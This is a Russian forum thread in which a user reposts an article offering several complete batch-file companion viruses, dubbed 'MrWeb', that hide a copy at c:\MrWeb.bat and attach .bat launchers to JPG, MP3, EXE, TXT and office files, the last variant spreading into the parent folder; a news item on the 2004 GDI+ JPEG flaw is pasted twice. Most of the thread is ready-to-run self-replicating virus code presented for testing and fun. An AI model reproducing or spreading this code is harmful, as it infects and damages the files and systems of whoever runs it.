PDA

Просмотр полной версии : BAt


Nik9
21.06.2010, 01:13
Эту статейку где то скопировал,не помню и за точность не ручаюсь.
Но почитать можно.

Вам известно, что JPG-файлы - это картинки. И вы наверно слышали, что заражать их нельзя. Но на самом деле заражать можно почти все. Вот смотрите. Вирус заражает *.JPG в текущем каталоге.

------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.jpg) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------

Как видите, этот вирус является BAT-файлом. Принцип работы такой же как и у BAT-вирусов.

Если вы не поняли как все это работает, то объясняю. Каждая вирусная строка имеет метку "MrWeb", в каких-то строках эта метка не является пассивной, т.е. учавствует в работе вируса, например во-второй строке вируса "if '%1=='In_ goto MrWebin" эта метка содержится в метке "MrWebin", а вот в первой строке эта метка является пассивной и поэтому она заключена в знаки процента. Дак вот, при старте вируса происходит копирование вирусных строк (с меткой) в специальный файл "c:\MrWeb.bat", конечно это происходит если данный файл не был раньше создан вирусом. Дальше вирус ищет *.JPG, если находит то заражает их, для этого вирус вызывает файл c:\MrWeb.bat и передает ему имя файла, который следует заразить. Принцип заражения: например найден файл 001.JPG, вирус создает вирусный файл 001.JPG.bat, т.е. принцип компаньон-вируса. Юзер захочет посмотреть картинку, щелкнет по нему мышкой и увидит то, что хотел увидеть, т.е. картинку, а тем временем заразятся все другие картинки.

Круто? И это еще не все, кто-то может еще сомневается, что можно заразить любой файл... Так, какие типы файлов будем заражать? Файлы *.mp3 ? Музыку значит. Нет проблем.

Смотрите:

------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.mp3) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------

Только знайте, если вы запускали первый пример вируса, а теперь хотите с этим поприкалываться, то удалите сначала специальный файл "c:\MrWeb.bat", а то будете потом говорить, что mp3 ни3я заразить...

Чтобы еще-то заразить... Давайте что-нибудь из классики, например *.EXE. Так...

------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.exe) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------

Учтите, что этот пример от предыдущего отличается не только банальным "*.exe", но и убиранием вызова виндовской программы start.

Что? *.txt заразить? Можно, хотя и не совсем нужно. Но я же говорил, что заражать можно все, значит получайте:

------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.txt) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------

Но это были всё пистики, а теперь тыковки. Внимание. Представляю вам мега-вирус, он заражает *.jpg *.mp3 *.doc *.htm? *.xls. Причем заражает не только в текущем каталоге, но и надкаталоге, поэтому не удивляйтесь, если при его испытании, он расползется по всему винту.

Вот он:

------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (..\*.jpg ..\*.doc ..\*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------

Напоминаю, если вы испытывали предыдущие примеры, то перед испытанием этого удалите файл c:\MrWeb.bat.

Если у вас проскакивает мысля о том, чтобы заражать "*.*", т.е. все типы файлов, то скажу, что это возможно, только нужно сделать, чтобы вирус пропускал *.bat, если это не сделать, то получится не вирус, а прикольный троян, можете проверить .

А вот что пишет ГРАНИ.RU

Microsoft признала заразность картинок

Изображение с сайта nolte-net.de/de/article/virus.html Компания Microsoft распространила предупреждение о критической ошибке в Windows, которая позволяет изображениям, созданным особым образом, загружать вредоносный код. Эта ошибка (вызываемая переполнением буфера) была обнаружена в модуле, который используется Windows и другими программами для воспроизведения картинок в популярном формате JPEG. В число этих программ входят Internet Explorer 6, Office XP, Office 2003, Windows Server 2003 и многие другие пакеты от Microsoft, передает BBC News.

Хакеры могут получить доступ к управлению любым компьютером, на котором будет открыта картинка, "заряженная" определенным образом. Поскольку одной из уязвимых программ является "сам" Internet Explorer, существует возможность заражения вирусом при посещении сайтов с вредоносными изображениями.

Специалисты призывают всех потенциальных жертв этой ошибки установить "заплатку", размещенную на сайте Microsoft. Кроме того, уже создан сервис, позволяющий пользователям определить, уязвимы ли установленные у них программные пакеты. В то же время в заявлении Microsoft говорится, что те пользователи, которые установили пакет обновлений Service Pack 2, уже защищены от этой ошибки.

Ссылки:
Buffer Overrun in JPEG Processing (GDI+) Could Allow Code Execution (833987) - Microsoft Security Bulletin MS04-028
September 2004 Security Update for JPEG Processing (GDI+)
Software bug raises spectre of 'JPEG of death' - New Scientist
версия для печати
16.09.2004 21:11

Комментарий :
Заразность картинок - это классическая байка, на которую издавна прохиндеи всех мастей ловили неопытных юзеров. Известны многочисленные "письма счастья", которые благополучно распространялись, используя страх пользователей перед тем, что просмотр безобидных на первый взгляд картинок может обернуться повреждением не только их программного обеспечения, но самих компьютерных "железок". В каком-то смысле картинки действительно могли быть источником опасности: например, благодаря тому, что по умолчанию Windows скрывает от пользователей расширение файлов, присланная по почте вредоносная программа могла "прикинуться" "особо ценной" порнографической картинкой и добиться своего запуска на исполнение. Другая известная история с "вредоносными" картинками связана с вирусом, который после заражения системы регистрировал безобидные "картиночные" расширения в Windows в качестве расширений исполняемых файлов, и таким образом становилась возможным пересылка и хранение вредоносного кода в файлах, имеющих расширение изображений. Но все-таки заразиться от самой картинки до сих пор считалось невозможным. Точно так же, как еще несколько лет назад казалось бредом и сущим обманом возможность заразиться от пришедшего по электронной почте письма, если его просто просматривать, а не открывать связанные с ним потенциально опасные вложения.

Но все течет, все меняется. Microsoft наконец удалось осуществить еще одну великую мечту всех хакеров. Вслед за письмами, в которые специалисты самой известной компьютерной корпорации научились встраивать никому не нужные скрипты, полезные только вирусописателям, настала очередь и картинок. С выходом Windows XP (насколько можно понять, в старых версиях Windows подобной "фичи" еще не встречалось) появилась возможность делать "заразные" картинки, и теперь весь Интернет, со всеми его сайтами, наполненными графикой, стал одной большой зоной повышенной опасности. Разумеется, за реализацию пока теоретически существующей возможности заражать нас картинками примется всякий, кто считает себя достойным звания "крутого хакера", и результат вскоре не замедлит сказаться.

А вот что пишет ГРАНИ.RU

Microsoft признала заразность картинок

Изображение с сайта nolte-net.de/de/article/virus.html Компания Microsoft распространила предупреждение о критической ошибке в Windows, которая позволяет изображениям, созданным особым образом, загружать вредоносный код. Эта ошибка (вызываемая переполнением буфера) была обнаружена в модуле, который используется Windows и другими программами для воспроизведения картинок в популярном формате JPEG. В число этих программ входят Internet Explorer 6, Office XP, Office 2003, Windows Server 2003 и многие другие пакеты от Microsoft, передает BBC News.

Хакеры могут получить доступ к управлению любым компьютером, на котором будет открыта картинка, "заряженная" определенным образом. Поскольку одной из уязвимых программ является "сам" Internet Explorer, существует возможность заражения вирусом при посещении сайтов с вредоносными изображениями.

Специалисты призывают всех потенциальных жертв этой ошибки установить "заплатку", размещенную на сайте Microsoft. Кроме того, уже создан сервис, позволяющий пользователям определить, уязвимы ли установленные у них программные пакеты. В то же время в заявлении Microsoft говорится, что те пользователи, которые установили пакет обновлений Service Pack 2, уже защищены от этой ошибки.

Ссылки:
Buffer Overrun in JPEG Processing (GDI+) Could Allow Code Execution (833987) - Microsoft Security Bulletin MS04-028
September 2004 Security Update for JPEG Processing (GDI+)
Software bug raises spectre of 'JPEG of death' - New Scientist
версия для печати
16.09.2004 21:11

Комментарий :
Заразность картинок - это классическая байка, на которую издавна прохиндеи всех мастей ловили неопытных юзеров. Известны многочисленные "письма счастья", которые благополучно распространялись, используя страх пользователей перед тем, что просмотр безобидных на первый взгляд картинок может обернуться повреждением не только их программного обеспечения, но самих компьютерных "железок". В каком-то смысле картинки действительно могли быть источником опасности: например, благодаря тому, что по умолчанию Windows скрывает от пользователей расширение файлов, присланная по почте вредоносная программа могла "прикинуться" "особо ценной" порнографической картинкой и добиться своего запуска на исполнение. Другая известная история с "вредоносными" картинками связана с вирусом, который после заражения системы регистрировал безобидные "картиночные" расширения в Windows в качестве расширений исполняемых файлов, и таким образом становилась возможным пересылка и хранение вредоносного кода в файлах, имеющих расширение изображений. Но все-таки заразиться от самой картинки до сих пор считалось невозможным. Точно так же, как еще несколько лет назад казалось бредом и сущим обманом возможность заразиться от пришедшего по электронной почте письма, если его просто просматривать, а не открывать связанные с ним потенциально опасные вложения.

Но все течет, все меняется. Microsoft наконец удалось осуществить еще одну великую мечту всех хакеров. Вслед за письмами, в которые специалисты самой известной компьютерной корпорации научились встраивать никому не нужные скрипты, полезные только вирусописателям, настала очередь и картинок. С выходом Windows XP (насколько можно понять, в старых версиях Windows подобной "фичи" еще не встречалось) появилась возможность делать "заразные" картинки, и теперь весь Интернет, со всеми его сайтами, наполненными графикой, стал одной большой зоной повышенной опасности. Разумеется, за реализацию пока теоретически существующей возможности заражать нас картинками примется всякий, кто считает себя достойным звания "крутого хакера", и результат вскоре не замедлит сказаться.

А вот что пишет журнал ХАКЕР

Автор: Pupkin-Zade
Дата: 14.06.2002 13:12:59

Специалисты Anti-Virus Response Team обнаружили новый тип вируса, W32/Perrun. Пользователю он прибывает в качестве exe-файла (около 12 Кб), при запуске прописывает себя в реестре и привязывает себя к JPEG-файлам (HKEY_CLASSES_ROOT\jpegfile\shell\open\command "(Default)" = (current directory)\EXTRK.EXE %1). Основная фишка в том, что это всего лишь экстрактор, он добывает свою исполняемую часть из зараженной JPEG-картинки при ее открытии (одновременно заражает и все картинки в той же директории). Пока вирус сам распространяться не может, однако думаю вскоре следует ожидать появления новых версий, более вредоносных.

GENDELF
22.06.2010, 15:05
Ты незабыл написать что этот код реально палится .

cyk10id
22.06.2010, 18:36
Зато появилась пища для размышления))) +++